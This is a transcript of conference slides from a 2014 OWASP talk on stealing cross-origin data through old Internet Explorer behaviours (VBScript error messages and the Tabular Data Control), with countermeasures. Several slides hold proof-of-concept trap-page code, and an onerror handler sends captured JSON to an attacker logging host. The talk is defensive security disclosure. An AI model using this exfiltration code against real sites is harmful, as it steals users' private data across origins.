bypass sop, theft your data - xss allstars from japan / owasp appsec apac 2014
DESCRIPTION
TRANSCRIPT
![Page 1: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/1.jpg)
Bypass SOP, Theft your data - XSS Allstars from Japan -
Yosuke HASEGAWA
![Page 2: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/2.jpg)
About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
![Page 3: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/3.jpg)
Agenda
Cross-Origin information disclosure
Not XSS, but bypass SOP
Introduce 2 ways for modern IE
VBScript Error msg
Tabular Data Control
![Page 4: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/4.jpg)
VBScript Error message
![Page 5: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/5.jpg)
VBScript Error Msg
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
Reading JSON Array as VBScript on trap page created by attacker
VBScript raises exception with error message including JSON content
JavaScript can access to JSON content via error message
![Page 6: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/6.jpg)
VBScript Error Msg
Reading JSON as VBScript src
fail → raises exception
// Trap page by attacker<scriptsrc="http://example.jp/target.json"language="vbscript">
</script>
HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]
![Page 7: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/7.jpg)
VBScript Error Msg
catch error msg with error handler
GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1Referer: http://attacker.utf-8.jp/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
<script>window.onerror = function( e ){
document.getElementById( "img" ).setAttribute("src", "http://attacker.utf-8.jp/log?" + e );
}</script><script src="http://example.jp/target.json"language="vbscript"></script>
![Page 8: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/8.jpg)
Countermeasure
Countermeasure
add "X-Content-Type-Options:nosniff"HTTP/1.1 200 OKContent-Type: application/json; charset=utf-8X-Content-Type-Options: nosniff
[ "secret", "data", "is", "here" ]
![Page 9: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/9.jpg)
VBScript Error Msgsupplementary
supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not.
"Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGIN" they said.
![Page 10: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/10.jpg)
Tabular Data Control
![Page 11: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/11.jpg)
Tabular Data Control
Tabular Data Control - TDCActiveX Control for binding text file into HTML as data tablehttp://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default on IE6-IE11, with older doc-mode<meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by Cure53 X-Mas Challengehttps://cure53.de/xmas2013/https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato
![Page 12: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/12.jpg)
Tabular Data Control
// Trap page by attacker on attacker.utf-8.jpfunction show(){
var s = document.getElementById("tdc").recordset.getString();
alert( s );}...<meta http-equiv="x-ua-compatible" content="IE=10" ><object id="tdc" ondatasetcomplete="show()"
classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><param name="DataURL" value="http://example.jp/target.txt"></object>
//target page included secret data on example.jp/target.txtContent-Type: application/octet-streamContent-Disposition: attachment; filename=bindataX-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jpsecret,data,is,here
![Page 13: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/13.jpg)
Tabular Data Control
Attacker has to insert "@!allow_domains=..." into the top of target text
Once inserted, no way to prevent from theft
Unhelpful:
X-Content-Type-Options: nosniffContent-Disposition: attachment
![Page 14: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/14.jpg)
Countermeasure
Countermeasure
Restrict access to XHR request with custom X header
and / or...
var xhr = new XMLHttpRequest();xhr.open( "GET", "http://example.jp/target.txt", true );xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");xhr.send( null );
GET /target.json HTTP/1.1Host: example.jpUser-Agent: Mozilla/5.0…Accept: */*X-Requested-With: XMLHttpRequest
![Page 15: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/15.jpg)
Countermeasure(cont.)
Countermeasure (cont.)
Don't allow to place text by attacker into top of the content
//target page included secret data on example.jp/target.txtContent-Type: application/octet-streamContent-Disposition: attachment; filename=bindataX-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jpsecret,data,is,here
![Page 16: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/16.jpg)
Conclusion
![Page 17: Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014](https://reader034.vdocuments.net/reader034/viewer/2022051513/5463d545b4af9f4e3f8b46cf/html5/thumbnails/17.jpg)
Conclusion
Conclusion
IE has funny behavior even now
Add X-Content-Type-Options for all resources
Restrict access to XHR with custom X- header